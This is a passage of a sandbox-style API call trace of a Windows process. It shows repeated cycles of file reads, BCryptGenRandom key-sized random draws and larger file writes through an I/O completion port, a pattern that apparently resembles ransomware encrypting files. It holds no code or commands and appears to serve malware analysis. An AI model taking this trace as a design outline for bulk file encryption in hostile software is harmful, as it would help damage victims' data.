lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0166.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.928] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x108a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0166.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.169] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x112e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.169] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.170] CloseHandle (hObject=0x3cc) returned 1 [0167.170] free (_Block=0x3df0008) [0167.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.179] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.180] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.180] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.180] free (_Block=0x3e305b8) [0167.181] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.181] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.181] free (_Block=0x1fa91d0) [0167.181] free (_Block=0x1fa2ed8) [0167.181] free (_Block=0x1fa90b8) [0167.181] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.181] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.182] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.193] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3926, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.194] CloseHandle (hObject=0x3cc) returned 1 [0167.194] free (_Block=0x3df0008) [0167.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.203] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.205] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.205] free (_Block=0x3e305b8) [0167.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.205] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.206] free (_Block=0x1fa91d0) [0167.206] free (_Block=0x1fa2ed8) [0167.206] free (_Block=0x1fa90b8) [0167.206] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.207] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.218] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.232] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9e2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.245] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ca0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.246] CloseHandle (hObject=0x3cc) returned 1 [0167.246] free (_Block=0x3df0008) [0167.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.257] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.257] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.257] free (_Block=0x3e305b8) [0167.257] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.257] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.257] free (_Block=0x1fa91d0) [0167.257] free (_Block=0x1fa2ed8) [0167.257] free (_Block=0x1fa90b8) [0167.257] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.259] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.270] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3100, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.271] CloseHandle (hObject=0x3cc) returned 1 [0167.271] free (_Block=0x3df0008) [0167.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.280] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.280] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.281] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.281] free (_Block=0x3e305b8) [0167.281] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.281] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.281] free (_Block=0x1fa91d0) [0167.281] free (_Block=0x1fa2ed8) [0167.281] free (_Block=0x1fa90b8) [0167.281] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.284] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.284] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.329] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x984, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.329] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.350] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x59c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.373] CloseHandle (hObject=0x308) returned 1 [0167.374] free (_Block=0x1ff1e60) [0167.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.386] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1418, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.404] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.418] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.418] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.418] free (_Block=0x3e305b8) [0167.418] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.418] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.418] free (_Block=0x1fa91d0) [0167.418] free (_Block=0x1fa2ed8) [0167.418] free (_Block=0x1fa90b8) [0167.418] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.429] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.430] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.444] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x75e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0167.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.458] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x62b2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0167.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.496] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6f26, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.540] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xb9d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.550] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.550] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.550] free (_Block=0x3e305b8) [0167.550] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.550] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.550] free (_Block=0x1fa91d0) [0167.550] free (_Block=0x1fa2ed8) [0167.551] free (_Block=0x1fa90b8) [0167.551] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.551] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.567] CloseHandle (hObject=0x2a8) returned 1 [0167.568] free (_Block=0x3f70048) [0167.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.572] CloseHandle (hObject=0x3cc) returned 1 [0167.577] free (_Block=0x3df0008) [0167.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.578] CloseHandle (hObject=0x2a4) returned 1 [0167.578] free (_Block=0x3d70450) [0167.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.611] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.612] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.612] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.612] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.612] free (_Block=0x3e305b8) [0167.612] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.612] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.613] free (_Block=0x1fa91d0) [0167.613] free (_Block=0x1fa2ed8) [0167.613] free (_Block=0x1fa90b8) [0167.613] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.615] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.828] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x41a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 